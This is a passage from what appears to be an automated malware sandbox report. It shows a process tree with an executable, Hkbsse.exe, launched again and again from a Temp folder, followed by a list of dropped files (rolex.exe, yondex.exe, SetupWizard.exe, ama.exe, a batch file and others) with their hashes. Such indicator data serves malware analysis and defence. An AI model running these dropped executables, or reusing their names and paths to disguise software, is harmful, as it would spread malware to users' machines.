                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                  1⤵
                                                                    PID:1068
                                                                  • C:\Windows\system32\werfault.exe
                                                                    werfault.exe /h /shared Global\8537df2d830a447a9d6e0e0495736320 /t 10744 /p 1068
                                                                    1⤵
                                                                      PID:7448
                                                                    • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                      1⤵
                                                                        PID:10404
                                                                      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                        1⤵
                                                                          PID:12808
                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                          1⤵
                                                                            PID:7800
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                              PID:6520
                                                                            • C:\Windows\system32\werfault.exe
                                                                              werfault.exe /h /shared Global\868ca247253f4484be57e8b5fd7e6602 /t 12400 /p 6520
                                                                              1⤵
                                                                                PID:10116
                                                                              • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                1⤵
                                                                                  PID:13044
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                    PID:5312
                                                                                  • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                    1⤵
                                                                                      PID:9280
                                                                                    • C:\Windows\system32\werfault.exe
                                                                                      werfault.exe /h /shared Global\2911ce4e26164c579262fa4318dcbac7 /t 0 /p 5312
                                                                                      1⤵
                                                                                        PID:13752
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                          PID:5908
                                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                          1⤵
                                                                                            PID:4244
                                                                                          • C:\Windows\system32\werfault.exe
                                                                                            werfault.exe /h /shared Global\870e5c47d0694313a84d0ff31357f986 /t 0 /p 5908
                                                                                            1⤵
                                                                                              PID:10024
                                                                                            • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                              1⤵
                                                                                                PID:13268
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                  PID:4568
                                                                                                • C:\Windows\system32\werfault.exe
                                                                                                  werfault.exe /h /shared Global\ee8e0c58aa8d40d49f1545a90c023607 /t 14056 /p 4568
                                                                                                  1⤵
                                                                                                    PID:6320
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                    1⤵
                                                                                                      PID:9256
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                      1⤵
                                                                                                        PID:13208
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                          PID:10680
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                          1⤵
                                                                                                            PID:10472
                                                                                                          • C:\Windows\system32\werfault.exe
                                                                                                            werfault.exe /h /shared Global\f89acc53030e4b18a9a7ed1b1c1f21b8 /t 0 /p 10680
                                                                                                            1⤵
                                                                                                              PID:5360
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                              1⤵
                                                                                                                PID:13712
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                1⤵
                                                                                                                  PID:10100
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                  1⤵
                                                                                                                    PID:11844
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                      PID:9420
                                                                                                                    • C:\Windows\system32\werfault.exe
                                                                                                                      werfault.exe /h /shared Global\10278a8c5a5246bdaa567c115d5fc0cc /t 4648 /p 9420
                                                                                                                      1⤵
                                                                                                                        PID:10756
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                        1⤵
                                                                                                                          PID:9920
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                          1⤵
                                                                                                                            PID:11292
                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                            1⤵
                                                                                                                              PID:9732
                                                                                                                            • C:\Windows\system32\werfault.exe
                                                                                                                              werfault.exe /h /shared Global\27814c10e5734d99a1c6def4799f942e /t 0 /p 9732
                                                                                                                              1⤵
                                                                                                                                PID:13048
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                1⤵
                                                                                                                                  PID:6892
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:11860
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                      PID:6684
                                                                                                                                    • C:\Windows\system32\werfault.exe
                                                                                                                                      werfault.exe /h /shared Global\cd31c822228f4f129cd92e5ea4c3360e /t 0 /p 6684
                                                                                                                                      1⤵
                                                                                                                                        PID:15528
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:12608
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:2928
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                              PID:10720
                                                                                                                                            • C:\Windows\system32\werfault.exe
                                                                                                                                              werfault.exe /h /shared Global\1eac46229587436da10939eaf1af2586 /t 9856 /p 10720
                                                                                                                                              1⤵
                                                                                                                                                PID:13760
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:9016
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:10148
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2736
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:14088
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:9524
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:9276

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Blaze.Udk

                                                                                                                                                            Filesize

                                                                                                                                                            53KB

                                                                                                                                                            MD5

                                                                                                                                                            d2401f10a4fbfda63177af824b7e96cb

                                                                                                                                                            SHA1

                                                                                                                                                            6f8b9073b641d60e9045865e585efe1085d72d1b

                                                                                                                                                            SHA256

                                                                                                                                                            dd35b93d3d04cce7fd02df183e70ed55194bd0b20fb051c324d9d869668ebce7

                                                                                                                                                            SHA512

                                                                                                                                                            4813c9367af384c07daef5a55f98f3156c0351973dbed0a8ac10fcd13bc1b443d2ec0c2d872e293bd65e74a5b1fcf1072054c222ee0adb83cc90fdec2e95f18b

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Multiplikatoren.Pri

                                                                                                                                                            Filesize

                                                                                                                                                            343KB

                                                                                                                                                            MD5

                                                                                                                                                            f344871c6ad32e2b5349eb4c277f85d9

                                                                                                                                                            SHA1

                                                                                                                                                            9298a5f90e75af375807bfc2df002d4ec88da098

                                                                                                                                                            SHA256

                                                                                                                                                            df634370973767c3fcc098bc48e4efd2a45d83af800db964fb659356b9a33096

                                                                                                                                                            SHA512

                                                                                                                                                            3d0d7c159aa899039c399d1a59ca527fb78511445c8d4344146a1e4e3ac74b11801b8ad913d1196f9496a31460f8039476b1d2d667f7540c841ae1455726f198

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                            Filesize

                                                                                                                                                            2KB

                                                                                                                                                            MD5

                                                                                                                                                            1cfe572f8a58e5c315192b2262b19389

                                                                                                                                                            SHA1

                                                                                                                                                            0ee01be5ceb2f4c1769d1461a33900abb85879ea

                                                                                                                                                            SHA256

                                                                                                                                                            a166e551d09fc5f77e4ede547e3dc521b71f4b5c07b93f16de2b0f976fed6751

                                                                                                                                                            SHA512

                                                                                                                                                            7820fe3c45dd79a37c31d4a5a03a167b254f0e2eb5b9acf374944ffbebc3e2c919d494cdfcbf7d4d9e8142dac21d1c0e1c7e56fbfe337e8336e5302d88bcaa2f

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\L5P12AEX\edgecompatviewlist[1].xml

                                                                                                                                                            Filesize

                                                                                                                                                            74KB

                                                                                                                                                            MD5

                                                                                                                                                            d4fc49dc14f63895d997fa4940f24378

                                                                                                                                                            SHA1

                                                                                                                                                            3efb1437a7c5e46034147cbbc8db017c69d02c31

                                                                                                                                                            SHA256

                                                                                                                                                            853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

                                                                                                                                                            SHA512

                                                                                                                                                            cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            2f6be89e5d31cd0b5993346f3ccb1285

                                                                                                                                                            SHA1

                                                                                                                                                            3e6fdc8bc0cc8072c99e29f34908ca2fc7e0eb35

                                                                                                                                                            SHA256

                                                                                                                                                            990ee94cd03a3e5401d456d4b8cc13a7ff88964bc8de4d01d27117e10681b2a2

                                                                                                                                                            SHA512

                                                                                                                                                            4c98a58c27fe6832932696f9238cea5c9bda9a973e5f6a818f1ca29dbb97ba39baac6f14ae737d83e2bd95bc01daa9a65070588ca44dc523192bd0e2403acf96

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            b8ba27c43b0ec6d693ef7c6e8302b9d2

                                                                                                                                                            SHA1

                                                                                                                                                            fb4cc91cb54bf469ee983194e29de7ff62870f3e

                                                                                                                                                            SHA256

                                                                                                                                                            766c3ef3ef6b04d6a477f533e8d3c54fd54e09eae40b70259aa6650e5496fe33

                                                                                                                                                            SHA512

                                                                                                                                                            0ed31102b7fbb445ba24dc031f2e12cae982733b5c295cce4fbacbafb87020c12b627973b622493c4091121344736d52daa664a369727d02cbdaccbb99c2e6a4

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            198ac4f39f7f980d8847fd5c4a6e0759

                                                                                                                                                            SHA1

                                                                                                                                                            72d99b5fcec6f7198576119d63a404cb0a769621

                                                                                                                                                            SHA256

                                                                                                                                                            3b3b556d711e90d7982b2cced8cac24eea79982ed03472be66b90f85f47bfb98

                                                                                                                                                            SHA512

                                                                                                                                                            38456a20558fc053a9731677af843ef78e43ca1ee3fa93bbb4e1ee93bddf2101994cbbfb0a41434f7ad78954cd0547e471069fd2b1c1342a8333277cbb816590

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\TABYYGGX\suggestions[1].en-US

                                                                                                                                                            Filesize

                                                                                                                                                            17KB

                                                                                                                                                            MD5

                                                                                                                                                            5a34cb996293fde2cb7a4ac89587393a

                                                                                                                                                            SHA1

                                                                                                                                                            3c96c993500690d1a77873cd62bc639b3a10653f

                                                                                                                                                            SHA256

                                                                                                                                                            c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

                                                                                                                                                            SHA512

                                                                                                                                                            e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6.exe

                                                                                                                                                            Filesize

                                                                                                                                                            4.8MB

                                                                                                                                                            MD5

                                                                                                                                                            5bb3677a298d7977d73c2d47b805b9c3

                                                                                                                                                            SHA1

                                                                                                                                                            91933eb9b40281e59dd7e73d8b7dac77c5e42798

                                                                                                                                                            SHA256

                                                                                                                                                            85eb3f6ba52fe0fd232f8c3371d87f7d363f821953c344936ab87728ba6a627f

                                                                                                                                                            SHA512

                                                                                                                                                            d20f862e9fadb5ad12eddaae8c6ebbfa03d67d35c5ca272e185206eb256cd6a89c338ce608c992df715d36a3f1624a507dbe324a057bd412b87438f4a008f33d

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Confirmed

                                                                                                                                                            Filesize

                                                                                                                                                            21KB

                                                                                                                                                            MD5

                                                                                                                                                            aa910cf1271e6246b52da805e238d42e

                                                                                                                                                            SHA1

                                                                                                                                                            1672b2eeb366112457b545b305babeec0c383c40

                                                                                                                                                            SHA256

                                                                                                                                                            f6aeee7fbc6ce536eef6d44e25edf441678d01317d0153dd3bda808c8c0fd25c

                                                                                                                                                            SHA512

                                                                                                                                                            f012780499c4a0f4bf2a7213976f66ec1769cf611d133f07204c2041b9d6804875b50e37e42feb51073868d5de503e35abbef4682c3191ae0a7b65ff14a64a07

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat

                                                                                                                                                            Filesize

                                                                                                                                                            36B

                                                                                                                                                            MD5

                                                                                                                                                            ce32eea7c273547d3fb75f8e4191e25a

                                                                                                                                                            SHA1

                                                                                                                                                            07d0edd1f64c799b01da4e670126b4b2c5091dde

                                                                                                                                                            SHA256

                                                                                                                                                            940d3c2d3a6665d5017c0bf64120a71b2ce61106ae015399282ae8f4656cb91f

                                                                                                                                                            SHA512

                                                                                                                                                            56da0be9e79b98fb276a6d5a26b2fe06035d46e299fc6e6cb4e04bb396d119204881518e93f2184a68aa34ff024f81281f131ff0f98cf39541cf857c96da95d4

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe

                                                                                                                                                            Filesize

                                                                                                                                                            4.4MB

                                                                                                                                                            MD5

                                                                                                                                                            8866d677a3309a0ad903f37557c5941b

                                                                                                                                                            SHA1

                                                                                                                                                            2b03d0c6cb74defedfc31154c57b073c889ea11a

                                                                                                                                                            SHA256

                                                                                                                                                            ecbccacd00cdf38870bea7d203909da1ea2261477125ff7e0bdcef5f3fc4d17d

                                                                                                                                                            SHA512

                                                                                                                                                            15535e08a5e224941610c90f0ba3921bb3a1911380889d393aedbc2e4806910171c81005cda27d23466292daec606abcb94d0fbf546430d70ea21de15cfe406e

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe

                                                                                                                                                            Filesize

                                                                                                                                                            4.0MB

                                                                                                                                                            MD5

                                                                                                                                                            bd2413c32e34d0031f7881d51ae731ff

                                                                                                                                                            SHA1

                                                                                                                                                            8771733c460f22adc0e1865f0b3f2ac19e9c1001

                                                                                                                                                            SHA256

                                                                                                                                                            277e5a809506398685fe20ba674b7f3f75b2e04a34c2b150a84088b266138894

                                                                                                                                                            SHA512

                                                                                                                                                            612c8b9f86308b13342cef00b9166084bf36f44addd139a0123f84cf9711fb2f03e15e4a0b3d95a6deaafb60bca1cc1436514b2b96f4aaf18b094534c94974cf

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\SetupWizard-66b0c80010508c0a\SetupWizard.exe

                                                                                                                                                            Filesize

                                                                                                                                                            41.6MB

                                                                                                                                                            MD5

                                                                                                                                                            238d13dbf889e407adfb6875aa27c95c

                                                                                                                                                            SHA1

                                                                                                                                                            62454d8c236cfe8ad1e62f90cfa3e28316a89be7

                                                                                                                                                            SHA256

                                                                                                                                                            e57f7b0a1101946b2dae8d06249e9736e2093a208cd508266f41a8b2df185526

                                                                                                                                                            SHA512

                                                                                                                                                            70afaf2344e962d1bcfbb221e3139226bdd2af3d7bbe040172e70d13b6df25a2f68dac9309435fe23edaa1c7e570eaceece1cf01b36cdab39722216f1dc21514

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uix4k0dv.mbt.ps1

                                                                                                                                                            Filesize

                                                                                                                                                            1B

                                                                                                                                                            MD5

                                                                                                                                                            c4ca4238a0b923820dcc509a6f75849b

                                                                                                                                                            SHA1

                                                                                                                                                            356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                                                            SHA256

                                                                                                                                                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                                                            SHA512

                                                                                                                                                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\0x3fg.exe

                                                                                                                                                            Filesize

                                                                                                                                                            415KB

                                                                                                                                                            MD5

                                                                                                                                                            c4aeaafc0507785736e000ff7e823f5e

                                                                                                                                                            SHA1

                                                                                                                                                            b1acdee835f02856985a822fe99921b097ed1519

                                                                                                                                                            SHA256

                                                                                                                                                            b1d5b1e480a5731caacc65609eaf069622f1129965819079aa09bc9d96dadde5

                                                                                                                                                            SHA512

                                                                                                                                                            fbaefbce3232481490bce7b859c6c1bafd87ee6d952a2be9bf7c4ed25fe8fc9aff46c2246e247aa05ce8e405831a5905ca366c5333ede0af48f9a6287479a12d

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\1.exe

                                                                                                                                                            Filesize

                                                                                                                                                            224KB

                                                                                                                                                            MD5

                                                                                                                                                            b96f0135250aab5a530906d079b178e1

                                                                                                                                                            SHA1

                                                                                                                                                            0247f3518116f23386796fc14991825dddfe1db8

                                                                                                                                                            SHA256

                                                                                                                                                            004eeca29e9a5bf7e40352873677e4a816e4efea504d96a3c308711fc5ada749

                                                                                                                                                            SHA512

                                                                                                                                                            244f56d2afd174f7f4e6430fcaa72d973b849a966d5df398d9a4120179dea9710689ed6d62a67e6adf4649a62cdec74ccd42de7e2f67e697ee3d1b50519fc4bd

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe

                                                                                                                                                            Filesize

                                                                                                                                                            2.4MB

                                                                                                                                                            MD5

                                                                                                                                                            033e16b6c1080d304d9abcc618db3bdb

                                                                                                                                                            SHA1

                                                                                                                                                            eda03c02fb2b8b58001af72390e9591b8a71ec64

                                                                                                                                                            SHA256

                                                                                                                                                            19fcb719130f0edd27552e014d5b446e85faabe82611311be6dbe28d33463327

                                                                                                                                                            SHA512

                                                                                                                                                            dbed8360dadb8d1733e2cf8c4412c4a468ade074000906d4ea98680f574ed1027fc326ccb50370166d901b011a140e5ee70fb9901ff53bf1205d85db097f1b79

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe

                                                                                                                                                            Filesize

                                                                                                                                                            2.5MB

                                                                                                                                                            MD5

                                                                                                                                                            ffada57f998ed6a72b6ba2f072d2690a

                                                                                                                                                            SHA1

                                                                                                                                                            6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f

                                                                                                                                                            SHA256

                                                                                                                                                            677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12

                                                                                                                                                            SHA512

                                                                                                                                                            1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe

                                                                                                                                                            Filesize

                                                                                                                                                            35.6MB

                                                                                                                                                            MD5

                                                                                                                                                            2396be52963d4de299555880b2723f04

                                                                                                                                                            SHA1

                                                                                                                                                            c7e3071e225f4ce93b390b11433d9cae8f07c726

                                                                                                                                                            SHA256

                                                                                                                                                            3e788961bac4517e3ecbf9a86fa233bf91231aba503aea8843867e8f3453458a

                                                                                                                                                            SHA512

                                                                                                                                                            6e94d73b7b4a6058056f55b6e3bf979abcd2602da65f3b8d664503f8d703e0ee88b1fa5042be875e1a6d302612364455d36d790e7c697f4fe1cae007a2f403ff

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\ama.exe

                                                                                                                                                            Filesize

                                                                                                                                                            297KB

                                                                                                                                                            MD5

                                                                                                                                                            5d860e52bfa60fec84b6a46661b45246

                                                                                                                                                            SHA1

                                                                                                                                                            1259e9f868d0d80ac09aadb9387662347cd4bd68

                                                                                                                                                            SHA256

                                                                                                                                                            b4a1e470f814bbcf1bc26c087eb513f4bab6165c90ecf43ac71dd87702561c30

                                                                                                                                                            SHA512

                                                                                                                                                            04ea5757d01508a44e0152b3aa78f530908da649d59b8ce7ee3e15c2d4d0314c97f346c1e79b1810edb27165d04781c022937d02536dc9b1dd4c55f023a47701

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\gui.exe

                                                                                                                                                            Filesize

                                                                                                                                                            527KB

                                                                                                                                                            MD5

                                                                                                                                                            8af55ab72dc0c45e52c7af0752cbbc4a

                                                                                                                                                            SHA1

                                                                                                                                                            227539093c2ca889a1f45e31fb124911d2de6519

                                                                                                                                                            SHA256

                                                                                                                                                            243e063270a045632b688cf570c2e9a8b4c3d2705726ad6b2ebf312e9f278e0e

                                                                                                                                                            SHA512

                                                                                                                                                            05ed4192b47c7c007712b2266d739a684b33f4d10ee77a10fdd15d9952ac23309d8ea2045efe80e59a14adddd196ca596a4f39d5963ebc8ad95969a2c4b7cbcd

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\limba.exe

                                                                                                                                                            Filesize

                                                                                                                                                            4.6MB

                                                                                                                                                            MD5

                                                                                                                                                            fff6606d4a13b7a04f736a68e3277c2b

                                                                                                                                                            SHA1

                                                                                                                                                            d1d9c3db1313414e03d2ab895ca864bb9ce6ddd8

                                                                                                                                                            SHA256

                                                                                                                                                            69bedfdccfbfccac91697383a8f7456eda4eefd2dc8abd6429b09d2a8b61d0f1

                                                                                                                                                            SHA512

                                                                                                                                                            2c1475801f896f3b9385f5bccec9129b3c48817747a5466a13a79616206e1315a9291becf90c055beb96d8b85e3858272c9d10144c99e6f9e608aec351d94e6c

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\pic1.exe

                                                                                                                                                            Filesize

                                                                                                                                                            4.8MB

                                                                                                                                                            MD5

                                                                                                                                                            1fecbc51b5620e578c48a12ebeb19bc2

                                                                                                                                                            SHA1

                                                                                                                                                            94fe551f4fb3ff76a0be99a962dc20fc2656453e

                                                                                                                                                            SHA256

                                                                                                                                                            9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a

                                                                                                                                                            SHA512

                                                                                                                                                            ede6f39946562e253fcafe225292db32ba30f9476557304ae1769830e3a46c660920c304ca42d52544411e41acfc1bf206c829c98d61948cb595b1fa0105e2d7

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\setup.exe

                                                                                                                                                            Filesize

                                                                                                                                                            36.5MB

                                                                                                                                                            MD5

                                                                                                                                                            0e12bdd2a8200d4c1f368750e2c87bfe

                                                                                                                                                            SHA1

                                                                                                                                                            6c8b533e2c7f6ebef027971c3a06f4c55ed64cfe

                                                                                                                                                            SHA256

                                                                                                                                                            af77c0b6a10ac159b0e3c87c02e16a2b44daab8e67fe097327e90ae48f814403

                                                                                                                                                            SHA512

                                                                                                                                                            909f15876f3a6cbe608eb53df4286927b013c45ff6acbc496a1590b9cc3fe47b1bb449ed45c3302f6d03cccb876cd2cc26f2b5e7c1ca4ff2d17dd4dee77bf75b

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\setup222.exe

                                                                                                                                                            Filesize

                                                                                                                                                            96KB

